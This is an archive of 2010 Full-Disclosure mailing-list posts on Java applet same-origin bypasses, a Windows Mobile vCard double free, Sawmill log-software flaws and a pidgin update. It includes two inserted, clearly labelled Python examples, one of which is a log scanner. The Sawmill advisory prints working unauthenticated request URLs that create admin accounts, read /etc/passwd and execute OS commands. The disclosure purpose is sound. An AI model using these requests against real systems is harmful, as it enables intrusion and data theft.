[Full-disclosure] Java Multiple Issues

2010-10-21 Thread Early Warning
Hi all and sorry for cross post,
after several months since I contacted Oracle informing them about ten
issues in Java applet security, they finally released Java 6 Update
22, which fixes several security issues.

In particular the issues are the following, sorted by impact:

* Information Disclosure:
  - 17364779 NETWORKINTERFACE HASHCODE PROBLEM
  - 17322679 JAVA APPLET DNS IP DISCLOSURE
* User Assisted Arbitrary Execution:
  - 17322757 ZERO TERMINATOR ALLOWS JNLP SHORTCUTS
  - 17322755 NEW LINES IN JNLP TITLE ARE COPIED INTO LNK FILES
* Network and WEB Attacks:
  - 17322683 HTTP REQUEST SPLITTING WITH JAVA ADDREQUESTPROPERTY
  - 17764405 DNS REBINDING ISSUE
  - 17322681 JAVA APPLET SAME IP HOST ACCESS

You can read all details here:
http://blog.mindedsecurity.com/2010/10/java-6u21-seven-issues-summary.html


Disclosure Timeline:
20th Apr - 6 May 2010: Advisories sent to Oracle
25th June 2010: Oracle Confirms all issues
12 Oct 2010: Java update 22 released which fixes 7 out of 10 issues.
11-20 Oct 2010: Minded Security Advisories publicly disclosed.


Cheers,
Stefano Di Paola

--
Stefano Di Paola
Chief Technology Officer, Lead Auditor ISO 27001
Minded Security - Application Security Consulting

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Rooted CON 2011: Welcome Hex Rays as new sponsor

2010-10-21 Thread Román Ramírez
Hello all,

We don't send emails to communicate sponsorships as we understand it is
quite disturbing and we all receive a lot of email.

But this is a special situation as I want to transmit a big THANK YOU to
the Hex Rays team, and specially to Ilfak Guilfanov, as he has been
absolutely kind with us, giving it support as quick as he was able to.

IDA Pro is a great product, but the team behind it is the greatest.

Thanks a lot, Hex Rays

http://www.facebook.com/l/e0f03FgjJ4fe1x13sURaCdSeCgQ;www.rootedcon.es/eng/blog/2010/10/new-rooted-con-2011-sponsor-hex-rays.html



Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass

2010-10-21 Thread Early Warning
Hey,
Michal thanks for the reply to defend credits :).

I had some moderation issues when I tried to send some word about this.
Just for sake of clarification:
I sent the advisory to Oracle on 20th April 2010. Oracle acknowledged
the issue in June.

If Roberto sent the advisory to Oracle then Oracle just didn't tell
him they already knew about it.
If Roberto just sent the issue to Apache then no one's faulty. :)
Anyway I hope credits will be at least shared between me and Roberto.

Cheers,
Stefano

2010/10/20 Michal Zalewski lcam...@coredump.cx:
 Security-Assessment.com follows responsible disclosure
 and promptly contacted Oracle after discovering
 the issue. Oracle was contacted on August 1,
 2010.

 My understanding is that Stefano Di Paola of Minded Security reported
 this back in April; and further, the feature was a part of reasonably
 well-documented functionality of Java pretty much ever since:

 http://download.oracle.com/javase/6/docs/api/java/net/URL.html

 Two hosts are considered equivalent if both host names can be
 resolved into the same IP addresses

 This was a pretty horrible design, so it's good to see it gone, though.

 /mz





Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass

2010-10-21 Thread Billy Rios
In the patch for CVE-2008-5343 (GIFAR) Sun tightened their file parsing
rules for remote JAR files, making it harder to smuggle JAR files onto the
end of other filetypes.  This makes it more difficult to create a GIF+JAR
hybrid file.  AFAIK, local JAR files were considered out of scope and will
not be subject to the additional file parsing scrutiny.

Sun/Oracle has not removed the ability to modify arbitrary HOST headers.
 So, if an attacker can upload a JAR file to a web app, they will have the
ability to jump to any domain (virtual hosted or subdomain) that exists on
the server.  The cookies sent by the applet will be from the domain provided
in the URL object, however the content returned by the server will be from
the domain specified in the HOST header.  This can cause havoc for places
where separation relies on subdomains (like wordpress.com et al.) where
users have by-design control of content on one subdomain and uses that
content to target users on a different subdomain.

Java also doesn't respect file extension, content-type, or
content-disposition returned by the web server making it a bit easier to
upload JAR files to unsuspecting web apps.


BK


On Wed, Oct 20, 2010 at 1:18 PM, Chris Evans scarybea...@gmail.com wrote:

 On Wed, Oct 20, 2010 at 8:58 AM, Michal Zalewski lcam...@coredump.cxwrote:

  Security-Assessment.com follows responsible disclosure
  and promptly contacted Oracle after discovering
  the issue. Oracle was contacted on August 1,
  2010.

 My understanding is that Stefano Di Paola of Minded Security reported
 this back in April; and further, the feature was a part of reasonably
 well-documented functionality of Java pretty much ever since:

 http://download.oracle.com/javase/6/docs/api/java/net/URL.html


 The Host: header trick was also used back in 2008 in Billy Rios' GIFAR
 attack -- to get around the fact that Picasa hosts images on a separate
 domain:

 http://xs-sniper.com/blog/2008/12/17/sun-fixes-gifars/

 The blog post title was SUN Fixes GIFARs, although it's not immediately
 obvious to me what was changed or fixed.

 If anyone knows what was changed back then and/or in this latest release,
 it would be interesting to see it documented.


 Cheers
 Chris




 Two hosts are considered equivalent if both host names can be
 resolved into the same IP addresses

 This was a pretty horrible design, so it's good to see it gone, though.

 /mz




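
Added example (not code from any poster, from Oracle, or from the advisory): a small Python model of the host-equivalence rule quoted above from the java.net.URL docs, side by side with a name-based rule, plus the Host header behaviour Billy Rios describes. The resolver table, cookie values and virtual-host contents are constructed; nothing here resolves real names or opens a socket.

```python
# Constructed resolver: two unrelated sites share one shared-hosting IP.
RESOLVER = {
    "www.targetsite.net": {"203.0.113.10"},
    "www.badsite.com": {"203.0.113.10"},
    "www.example.org": {"198.51.100.7"},
}


def same_origin_by_ip(host_a, host_b, resolver=RESOLVER):
    """Old rule from the java.net.URL docs: two hosts are equivalent if both
    names resolve to the same IP addresses. Names that do not resolve fall
    back to a plain name comparison."""
    ips_a = resolver.get(host_a)
    ips_b = resolver.get(host_b)
    if ips_a and ips_b:
        return ips_a == ips_b
    return host_a.lower() == host_b.lower()


def same_origin_by_name(host_a, host_b):
    """Browser-style rule: the host name itself is the origin; a shared IP
    address grants nothing."""
    return host_a.lower() == host_b.lower()


class SharedServer:
    """One IP address serving several virtual hosts, chosen by the Host header."""

    def __init__(self, vhosts):
        self.vhosts = vhosts

    def serve(self, host_header):
        return self.vhosts.get(host_header, "404 unknown virtual host")


class AppletClient:
    """Applet-side request model. The origin rule decides whether the URL's
    host may be contacted at all; the cookies attached are the ones stored for
    the URL's host; the server picks its virtual host from the Host header,
    which the applet may still override."""

    def __init__(self, origin, cookie_jar, origin_rule):
        self.origin = origin
        self.cookie_jar = cookie_jar
        self.origin_rule = origin_rule

    def fetch(self, url_host, server, host_header=None):
        if not self.origin_rule(self.origin, url_host):
            raise PermissionError(f"{self.origin} may not connect to {url_host}")
        cookies = self.cookie_jar.get(url_host, {})
        return cookies, server.serve(host_header or url_host)


def compare_rules():
    """Replay the thread's scenario under both rules and report what each
    one lets an applet served from www.badsite.com obtain."""
    server = SharedServer({
        "www.targetsite.net": "target-site page",
        "www.badsite.com": "bad-site page",
    })
    # Constructed cookie jar: the browser holds a session for targetsite only.
    jar = {"www.targetsite.net": {"session": "constructed-session-value"}}
    results = {}
    for name, rule in (("by_ip", same_origin_by_ip), ("by_name", same_origin_by_name)):
        client = AppletClient("www.badsite.com", jar, rule)
        try:
            cookies, body = client.fetch("www.targetsite.net", server)
            results[name] = {"allowed": True, "cookies_sent": cookies, "body": body}
        except PermissionError:
            results[name] = {"allowed": False}
    # Even under the name rule the Host header still selects the neighbouring
    # virtual host; only the cookies are now limited to the applet's own host.
    client = AppletClient("www.badsite.com", jar, same_origin_by_name)
    cookies, body = client.fetch("www.badsite.com", server, host_header="www.targetsite.net")
    results["host_header"] = {"allowed": True, "cookies_sent": cookies, "body": body}
    return results


if __name__ == "__main__":
    for rule, outcome in compare_rules().items():
        print(rule, outcome)
```

Under the IP rule the applet from www.badsite.com is allowed to fetch www.targetsite.net with that site's cookies attached, which is the whole bypass; under the name rule the same call is refused. The last case shows the residual point from Billy's post: the Host header still picks the other virtual host's content, but no cookies for it are sent.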

Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass

2010-10-21 Thread Stefano Di Paola
Hi Roberto,
nice to see you always alive and kicking!

It seems we found the same stuff :) my bad I haven't yet published it.

Soon also my advisory with some collateral effect^N^N^N^N^N^Nthoughts.

Cheers
Stefano


On Wed, 20/10/2010 at 00.20 +1300, Roberto Suggi Liverani
wrote:
 (, ) (,
   .   `.' ) ('.',
). , ('.   ( ) (
   (_,) .`), ) _ _,
  /  _/  / _  \     _  
  \  \==/ /_\  \ _/ ___\/  _ \ / \ 
  /   \/   |\\  \__(  _ )  Y Y  \
 /__  /\___|__  / \___  /|__|_|  /
 \/ \/.-.\/ \/:wq 
 (x.0)
   '=.|w|.='
   _='```=.
 
   presents..
 
 Oracle JRE - java.net.URLConnection class – 
 Same-of-Origin (SOP) Policy Bypass
 
 PDF: 
 http://www.security-assessment.com/files/advisories/Oracle_JRE_java_net_urlconnection_SOP_Bypass.pdf
 CVE Identifier: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3573
 
 
 +---+
 |Description|
 +---+
 
 Security-Assessment.com discovered that a Java Applet 
 making use of java.net.URLConnection class can be used 
 to bypass same-of-origin (SOP) policy and domain based 
 security controls in modern browsers when communication 
 occurs between two domains that resolve to the same IP 
 address. This advisory includes a Proof-of-Concept 
 (PoC) demo and a Java Applet source code, which 
 demonstrates how this security can be exploited to leak 
 cookie information to an unauthorised domain, which 
 resides on the same host IP address.
 
 ++
 |Exploitation|
 ++
 
 The Flash movie demo can be viewed at the following 
 link:
 
 http://www.security-assessment.com/files/advisories/java_net_urlconnection_sop_bypass_demo.swf
 
 Proof of Concept (PoC) in demo demonstrates that a 
 Cross Site Request Forgery (XSRF) attack can be leveraged 
 by using a Java Applet which implements the 
 java.net.URLConnection class. Traditionally, XSRF is used 
 to force a user to perform an unwanted action on a target 
 web site. In this case, the PoC shows that XSRF can be 
 used to capture sensitive information such as cookie 
 associated to a target web site.
 
 The following assumptions are made in this PoC:
 
 1. Virtual hosts www.targetsite.net and 
 www.badsite.com resolve to the same IP address;
 
 2. Malicious user controls www.badsite.com web site;
 
 3. Malicious user targets www.targetsite.net users.
 
 The following list summarises the sequence of actions 
 shown in the demo:
 
 
 1. User has a valid cookie for www.targetsite.net
 
 2. The same user visits www.badsite.com which performs 
 a cross site forged request to www.targetsite.net . 
 The forged request is performed by a Java Applet 
 embedded on the malicious site. The Java Applet 
 bypasses the Same-of-Origin policy as an unsigned Java 
 Applet should not be able to communicate 
 from www.badsite.com to www.targetsite.net without 
 a crossdomain.xml policy file.
 
 3. Java Applet performs first GET request to 
 www.targetsite.net. At this stage, the Java Applet 
 controls the Cookie: header sent to www.targetsite.net
 through the getRequestProperty(cookie) method.
 This is in breach with SOP.
 
 4. A second request is done for the purpose 
 of the demo which leaks www.targetsite.net 
 cookie’s to www.badsite.com via an HTTP GET 
 request.
 
 
 Testing was successfully performed using Java(TM) 
 SE Runtime Environment (build 1.6.0_21-b07) and the 
 following browsers:
 
 - Mozilla Firefox 3.5.8 (Windows XP)
 - Opera 10.60 (Windows XP)
 - Internet Explorer 6.0.2900.5512 (Windows XP)
 - Google Chrome 5.0.375.9 (Windows XP)
 - Internet Explorer 8.0.6001.18702 (Windows XP)
 - Safari 5.0 (7533.16) (Windows XP)
 
 The Java Applet source code used in the demo can be 
 downloaded at the following link:
 
 http://www.security-assessment.com/files/advisories/MaliciousJavaApplet.zip
 
 ++
 |Solution|
 ++
 
 Security-Assessment.com follows responsible disclosure
 and promptly contacted Oracle after discovering
 the issue. Oracle was contacted on August 1,
 2010.
 
 Oracle has created a fix for this vulnerability which 
 has been included as part of Critical Patch Update 
 Advisory - October 2010. Security-Assessment.com 
 recommends all users of JRE and JDK to upgrade to 
 the latest version as soon as possible. 
 
 For more information on the new release of JRE/JDK 
 please refer to the link:
 
 http://www.oracle.com/technetwork/java/javase/downloads/index.html
 
 +--+
 |Credit|
 +--+
 
 Discovered and advised to Oracle
 August 2010 by Roberto Suggi Liverani of 
 Security-Assessment.com.
 
 Personal site: http://malerisch.net
 
 +-+
 |Extra|
 +-+
 
 Another interesting attack was discovered as part 
 of the research on this vulnerability.
 This attack is another example of leveraging XSRF 
 with the potential of leaking cookie, basic and digest
 authentication tokens using Java Applet and the 
 Compability 

Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass

2010-10-21 Thread Stefano Di Paola
Hey all,
I think it's Oracle's bad.
I reported this issue to Oracle back on April 20th, and when Roberto
reported the same stuff in August, Oracle probably just said thank you and
nothing more to Roberto.

Also Oracle seems to do mass credit so everyone can think that anyone
found anything among the 29 advisories :D
http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html

Anyway, I'll post the advisory clarification today :)

Cheers 
Stefano


On Wed, 20/10/2010 at 08.58 -0700, Michal Zalewski wrote:
  Security-Assessment.com follows responsible disclosure
  and promptly contacted Oracle after discovering
  the issue. Oracle was contacted on August 1,
  2010.
 
 My understanding is that Stefano Di Paola of Minded Security reported
 this back in April; and further, the feature was a part of reasonably
 well-documented functionality of Java pretty much ever since:
 
 http://download.oracle.com/javase/6/docs/api/java/net/URL.html
 
 Two hosts are considered equivalent if both host names can be
 resolved into the same IP addresses
 
 This was a pretty horrible design, so it's good to see it gone, though.
 
 /mz
 




Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass

2010-10-21 Thread Matthew Bergin

the keys to the interwebz!


 CC: roberto.su...@security-assessment.com; full-disclosure@lists.grok.org.uk; 
 bugt...@securityfocus.com
 From: d...@doxpara.com
 Subject: Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - 
 java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass
 Date: Wed, 20 Oct 2010 10:38:12 -0700
 To: lcam...@coredump.cx
 
 
 
 Sent from my iPhone
 
 On Oct 20, 2010, at 8:58 AM, Michal Zalewski lcam...@coredump.cx wrote:
 
  Security-Assessment.com follows responsible disclosure
  and promptly contacted Oracle after discovering
  the issue. Oracle was contacted on August 1,
  2010.
  
  My understanding is that Stefano Di Paola of Minded Security reported
  this back in April; and further, the feature was a part of reasonably
  well-documented functionality of Java pretty much ever since:
  
  http://download.oracle.com/javase/6/docs/api/java/net/URL.html
  
  Two hosts are considered equivalent if both host names can be
  resolved into the same IP addresses
  
  This was a pretty horrible design, so it's good to see it gone, though.
 
 Eh, you can see where it came from though. Design bugs like this are 
 absolutely miserable to fix (see how we'll never get rebinding out of the 
 browser) and letting identical IPs script against each other lets an awful 
 lot of legitimate traffic through while blocking almost all attacks.
 
 I'm not saying it's a preferred design, but let's reserve horrible for 
 things that don't have quite the obvious thought process behind them.
 
 Is this, in fact, gone now?
 
  
  /mz
  

[Full-disclosure] [SecurityArchitect-009]: Microsoft Windows Mobile Double Free Vulnerability

2010-10-21 Thread musashi karak0rsan

Vendor: Microsoft
Product: Windows Mobile
Vulnerability: Double Free
Tested vulnerable versions: Windows Mobile 6.1 and 6.5
Tested on : HTC Touch (WM 6.1), HTC Touch2 (WM 6.5)
CREDITS: Celil Ünüver from SecurityArchitect.Org
CONTACT: celilunuver[n0sp4m]gmail.com
Vulnerability Details and Analysis:
The vulnerability is a double free. It occurs when multiple buffers are 
allocated to handle a very large Name (N) field in the vCard (.vcf) file. This 
file can be received by MMS or Bluetooth. After opening the malformed vcf file, 
it gives an error dialog. Then it frees the buffers and crashes;
pimutil.dll:

.text:02B73DE0 sub_2B73DE0                 ; CODE XREF: sub_2B74388+1Cp
.text:02B73DE0     STMFD   SP!, {R4,LR}
.text:02B73DE4     MOV     R4, R0
.text:02B73DE8     LDR     R2, [R4,#0xC]
.text:02B73DEC     LDR     R3, =off_2B66DB8
.text:02B73DF0     CMP     R2, #0
.text:02B73DF4     LDRNE   R0, [R4,#8]
.text:02B73DF8     STR     R3, [R4]
.text:02B73DFC     BLNE    sub_2BA6350
.text:02B73E00     LDR     R0, [R4,#8]
.text:02B73E04     BL      sub_2BA56F8      ; sysfreestring()
.text:02B73E08     LDR     R0, [R4,#0x14]   ; *!*
.text:02B73E0C     BL      sub_2BA56F8      ; sysfreestring
.text:02B73E10     LDR     R0, [R4,#0x14]   ; *DOUBLE FREE!!!*
.text:02B73E14     BL      sub_2BA56F8      ; sysfreestring
.text:02B73E18     LDR     R0, [R4,#8]
.text:02B73E1C     BL      sub_2BA56F8
.text:02B73E20     LDR     R3, =(dword_2B66D30+8)
.text:02B73E24     STR     R3, [R4]
.text:02B73E28     LDMFD   SP!, {R4,LR}
.text:02B73E2C     BX      LR

As you can see, the pointer at [R4 + 0x14] is passed to SysFreeString() twice.

.text:0271E4C0 SysFreeString               ; CODE XREF: sub_271AE68+1Cp
.text:0271E4C0                             ; sub_271AE68+24p
.text:0271E4C0     STMFD   SP!, {R4,LR}
.text:0271E4C4     CMP     R0, #0
.text:0271E4C8     BEQ     loc_271E508
.text:0271E4CC     LDR     R3, =0x1ECD1B8
.text:0271E4D0     SUB     R4, R0, #8
.text:0271E4D4     LDR     R0, [R3]
.text:0271E4D8     BL      sub_27391B8
.text:0271E4DC     CMP     R0, #0
.text:0271E4E0     BNE     loc_271E4F4
.text:0271E4E4     MOV     R0, R4
.text:0271E4E8     BL      sub_2739168
.text:0271E4EC     LDMFD   SP!, {R4,LR}
.text:0271E4F0     BX      LR
.text:0271E4F4 ; ---------------------------------------------------------------
.text:0271E4F4
.text:0271E4F4 loc_271E4F4                 ; CODE XREF: SysFreeString+20j
.text:0271E4F4     LDR     R3, [R4]         ; <- CRASH !!
.text:0271E4F8     MOV     R1, R4
.text:0271E4FC     ADD     R3, R3, #0x19
.text:0271E500     BIC     R2, R3, #0xF
.text:0271E504     BL      sub_27295BC
.text:0271E508

The code at location 0271E4F4 is attempting to extract the 'size' from the
heap chunk header.

Exploiting:
Double frees are usually exploitable but in this case it doesn't look simple.
The calls to free() occur in immediate succession. WinCE supports
multi-threading, but this is an extremely hard case to try.. I do not have deep
knowledge about WinCE heap structures. So it may be denial of service but I
think it can be possible to exploit this vulnerability. (impossible is nothing
! :P)

Proof of Concept:
www.securityarchitect.org/exploits/wmpoc.vcf

Vendor-Patch Status:
It's 0day :] Actually I contacted Microsoft but they said "we fixed this issue
on WM 6.5 version and we can not publish a bulletin for it". But I'm sure that
it is not fixed on 6.5 version. I've tested it on several devices which have
WM 6.5. Also I've tested it on WM 6.5 Professional Emulator (which can be
downloaded from MS Pages), it crashes too.

Last Words: We are not dead, just busy!

Greets to: SecurityArchitect Members (Ulascan), Hellcode, murderkey ...

Links: www.securityarchitect.org, blog.securityarchitect.org

Re: [Full-disclosure] Rooted CON 2011: Welcome Hex Rays as new sponsor

2010-10-21 Thread Mario Vilas
<paranoid> Uhm, why the redirection through Facebook? </paranoid>

2010/10/21 Román Ramírez pat...@0z0ne.com

 Hello all,

 We don't send emails to communicate sponsorships as we understand it is
 quite disturbing and we all receive a lot of email.

 But this is a special situation as I want to transmit a big THANK YOU to
 the Hex Rays team, and specially to Ilfak Guilfanov, as he has been
 absolutely kind with us, giving it support as quick as he was able to.

 IDA Pro is a great product, but the team behind it is the greatest.

 Thanks a lot, Hex Rays


 http://www.facebook.com/l/e0f03FgjJ4fe1x13sURaCdSeCgQ;www.rootedcon.es/eng/blog/2010/10/new-rooted-con-2011-sponsor-hex-rays.html





-- 
HONEY: I want to… put some powder on my nose.
GEORGE: Martha, won’t you show her where we keep the euphemism?

[Full-disclosure] SEC Consult SA-20101021-0 :: Multiple critical vulnerabilities in Sawmill log analysis software

2010-10-21 Thread Johannes Greil
SEC Consult Security Advisory < 20101021-0 >
===============================================================================
              title: Multiple critical vulnerabilities
            product: Sawmill - Universal Log File Analysis
 vulnerable version: Sawmill Enterprise < v8.1.7.3
      fixed version: v8.1.7.3
             impact: critical
           homepage: http://www.sawmill.net
              found: 2010-07-20
                 by: J. Greil / SEC Consult / www.sec-consult.com
===============================================================================

Vendor description:
---
Sawmill is universal log analysis software that runs on every major
platform. It can process almost any type of log data. The reports that
Sawmill generates are hierarchical, attractive, and heavily
cross-linked for easy navigation. Complete documentation is built
directly into the program.

source:
http://www.sawmill.net/features.html


Vulnerability overview/description:
---
Sawmill suffers from multiple critical vulnerabilities which allow an
_unauthenticated_ attacker to gain administrative rights. Furthermore
it is possible to access (RW) the file system and execute arbitrary
commands on the operating system without authentication.

Attackers with valid accounts are able to reset the root password or
add/delete log profiles, view and manipulate admin settings etc.

It must be noted that further vulnerabilities are to be expected 
within the software (such as buffer overflows, etc.). Due to lack of 
time no further vulnerabilities could be searched.


1) Unauthenticated access to critical functions
Unauthenticated attackers are e.g. able to create new user accounts 
with administrative Manager roles. It is possible to exploit the 
built-in salang scripting language to read/write files on the file 
system (e.g. user configuration with MD5 hashes), connect to other 
internal systems or execute arbitrary operating system commands.


2) Insufficient validation of user access rights
Users with standard access rights/roles (e.g. Statistics Visitor) are
able to access functions or methods of the Sawmill application where
they shouldn't have access to (default permissions of installation).

Statistics visitor users are able to access administrative functions
or admin menus in order to gain sensitive information or even manipulate
settings, create new profiles or delete profiles. The creation of new
profiles also results in a denial-of-service (temporarily until admin
deletes profiles) if more profiles are being created than the license
currently allows.

It is possible to access the Sawmill setup page in order to reset the
Sawmill root username and password with a standard user account.

A standard user is also able to gain access to more functions within
the interface (e.g. regarding profiles) just by changing local
JavaScript variables, e.g. through an intercepting proxy server.


3) XSS / CSRF
There are many parameters which are not properly sanitised and
vulnerable to XSS. Furthermore no protection against CSRF is in place 
which e.g. allows remote attackers to reset the root password by 
e.g. exploiting the vulnerabilities in section 1 or 2.


Proof of concept:
-----------------
1) Unauthenticated access to critical functions

* Create a user account with admin rights:
http://$host/?a=cu&u=testing&pw=testing&roles=role_1

* Read files of the file system:
http://$host/?a=ee&exp=error(read_file('/etc/passwd'))
http://$host/?a=ee&exp=error(read_file('LogAnalysisInfo/users.cfg'))

(error() call is needed to print the output within the web interface
instead of stdout)

* Write files:
E.g. use the write_file() method

* Execute OS commands:
http://$host/?a=ee&exp=exec('/bin/ls','Output',1))
(exec() only returns PID and no output. I'll leave it to the
creativity of the reader to further exploit this :))


2) Insufficient validation of user access rights

* Access to the new profile wizard including file browser as standard
  Statistics viewer user:
  This feature also allows to choose arbitrary files as log analysis
  input and to disclose its contents then (file disclosure):
  
http://$host/?dp+templates.new_profile_wizard.index

* Access the Sawmill setup page to reset Sawmill root password:
http://$host/?dp=templates.setup

* Gain sensitive information, such as config/user settings:
http://$host/?dp=templates.admin_pages.users.get_data&v.fp.is_root_admin=true&v.fp.is_unlimited_grants=true

http://$host/?dp=templates.admin_pages.root_admin.get_data
[... see file system for further pages ...]

* Manipulate/create/delete user accounts:
  POST /?dp+templates.admin_pages.users.save_data 
  Host: $host

  v.fp.is_enterprise=true
  v.fp.deleted_users=
  v.fp.users.user_1.is_new=false
  v.fp.users.user_1.username=x
  v.fp.users.user_1.password=
  v.fp.users.user_1.language=
  v.fp.users.user_1.created_by_user=root_admin
  v.fp.users.user_1.access.0.all_profiles=false
  v.fp.users.user_1.access.0
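
Added example (not part of the SEC Consult advisory or of Sawmill): a small Python scanner that flags, in web server access logs, the request patterns the proof-of-concept section above lists, so an administrator can check whether those functions were reached before the upgrade to v8.1.7.3. The log lines are constructed, the NCSA combined log format is assumed, and the tag names are the author's own.

```python
import re
from urllib.parse import unquote

# NCSA combined log format (constructed sample lines below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)


def parse_query(target):
    """Split the query string of a request target into {key: [values]}.

    Sawmill URLs use the usual '?a=...&exp=...' form and also the
    '?dp+templates...' form shown in the advisory, so a pair may be
    separated by '=' or by '+'.
    """
    query = target.partition("?")[2]
    params = {}
    for part in query.split("&"):
        if not part:
            continue
        if "=" in part:
            key, _, value = part.partition("=")
        elif "+" in part:
            key, _, value = part.partition("+")
        else:
            key, value = part, ""
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def classify(params):
    """Return the tags (constructed names) matching the advisory's PoC requests."""
    tags = []
    action = params.get("a", [""])[0]
    pages = params.get("dp", [])
    if action == "ee":
        tags.append("salang-eval")      # server-side expression evaluation
    if action == "cu":
        tags.append("create-user")      # unauthenticated account creation
    if any(p.startswith("templates.setup") for p in pages):
        tags.append("setup-page")       # root credential reset page
    if any(p.startswith("templates.admin_pages") for p in pages):
        tags.append("admin-page")
    if any(p.startswith("templates.new_profile_wizard") for p in pages):
        tags.append("profile-wizard")   # includes the file browser
    if any(k in ("v.fp.is_root_admin", "v.fp.is_unlimited_grants") for k in params):
        tags.append("privilege-flag")   # client-supplied privilege parameters
    return tags


def scan(lines):
    """Return (ip, target, tags) for every request that matches a signature."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        tags = classify(parse_query(match.group("target")))
        if tags:
            hits.append((match.group("ip"), match.group("target"), tags))
    return hits


# Constructed sample log: ordinary traffic mixed with the PoC requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Oct/2010:10:15:01 +0200] "GET /?dp=templates.profile.index HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [21/Oct/2010:10:15:09 +0200] "GET /?a=ee&exp=error(read_file(%27/etc/passwd%27)) HTTP/1.1" 200 1887 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [21/Oct/2010:10:15:22 +0200] "GET /?a=cu&u=testing&pw=testing&roles=role_1 HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [21/Oct/2010:10:16:40 +0200] "GET /?dp=templates.setup HTTP/1.1" 200 2950 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [21/Oct/2010:10:16:55 +0200] "GET /?dp=templates.admin_pages.users.get_data&v.fp.is_root_admin=true HTTP/1.1" 200 980 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [21/Oct/2010:10:17:03 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, target, tags in scan(SAMPLE_LOG):
        print(ip, ",".join(tags), target)
```

The tags are deliberately coarse: admin pages and the setup page are legitimate for the root admin, so a hit is a lead to correlate with the session's authenticated user, not a verdict on its own.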

[Full-disclosure] [ MDVSA-2010:208 ] pidgin

2010-10-21 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:208
 http://www.mandriva.com/security/
 ___

 Package : pidgin
 Date: October 21, 2010
 Affected: 2009.0, 2010.0, 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 A security vulnerability has been identified and fixed in pidgin:
 
 It has been discovered that eight denial of service conditions exist
 in libpurple all due to insufficient validation of the return value
 from purple_base64_decode(). Invalid or malformed data received in
 place of a valid base64-encoded value in portions of the Yahoo!, MSN,
 MySpaceIM, and XMPP protocol plugins and the NTLM authentication
 support trigger a crash. These vulnerabilities can be leveraged by
 a remote user for denial of service (CVE-2010-3711).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 This update provides pidgin 2.7.4, which is not vulnerable to this
 issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3711
 http://pidgin.im/news/security/
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 01b8018cd3acd742b80ae39cf9437f61  2009.0/i586/finch-2.7.4-0.1mdv2009.0.i586.rpm
 7e9adf0099fc897f11377897f879b8ee  2009.0/i586/libfinch0-2.7.4-0.1mdv2009.0.i586.rpm
 149fce87377d5d0b2c33b616f45c973a  2009.0/i586/libpurple0-2.7.4-0.1mdv2009.0.i586.rpm
 704fe07620e9822116bf7d7d0d58d7b2  2009.0/i586/libpurple-devel-2.7.4-0.1mdv2009.0.i586.rpm
 e1c4593f294198e53b9a3fe1a0bab068  2009.0/i586/pidgin-2.7.4-0.1mdv2009.0.i586.rpm
 96bdc026fd3bcdc86f3a2968dc346253  2009.0/i586/pidgin-bonjour-2.7.4-0.1mdv2009.0.i586.rpm
 e200d998e4d1e02bbf2c6c1813199c55  2009.0/i586/pidgin-client-2.7.4-0.1mdv2009.0.i586.rpm
 3b0973e9f4a7a3850699ecbf05c7594f  2009.0/i586/pidgin-gevolution-2.7.4-0.1mdv2009.0.i586.rpm
 65a4bc6fbc1ad89e1985ebecd5420255  2009.0/i586/pidgin-i18n-2.7.4-0.1mdv2009.0.i586.rpm
 70b78c339f53fb9c3dab8c6ac587d903  2009.0/i586/pidgin-meanwhile-2.7.4-0.1mdv2009.0.i586.rpm
 ac8affa20bd6bb5e93987804885f6bfc  2009.0/i586/pidgin-perl-2.7.4-0.1mdv2009.0.i586.rpm
 195a4a495944d9d59abff9f7617a877a  2009.0/i586/pidgin-plugins-2.7.4-0.1mdv2009.0.i586.rpm
 26c08e34c2392f67994811b18286d2cd  2009.0/i586/pidgin-silc-2.7.4-0.1mdv2009.0.i586.rpm
 9dde81a28d9f1538cd9d97c48fdcf991  2009.0/i586/pidgin-tcl-2.7.4-0.1mdv2009.0.i586.rpm
 bbfe063e27008c72e0a2f9793906f5e4  2009.0/SRPMS/pidgin-2.7.4-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 b47c892f7c4874a95dd98bb6864354cc  2009.0/x86_64/finch-2.7.4-0.1mdv2009.0.x86_64.rpm
 08d882fd48a6e2e74716a3605751475a  2009.0/x86_64/lib64finch0-2.7.4-0.1mdv2009.0.x86_64.rpm
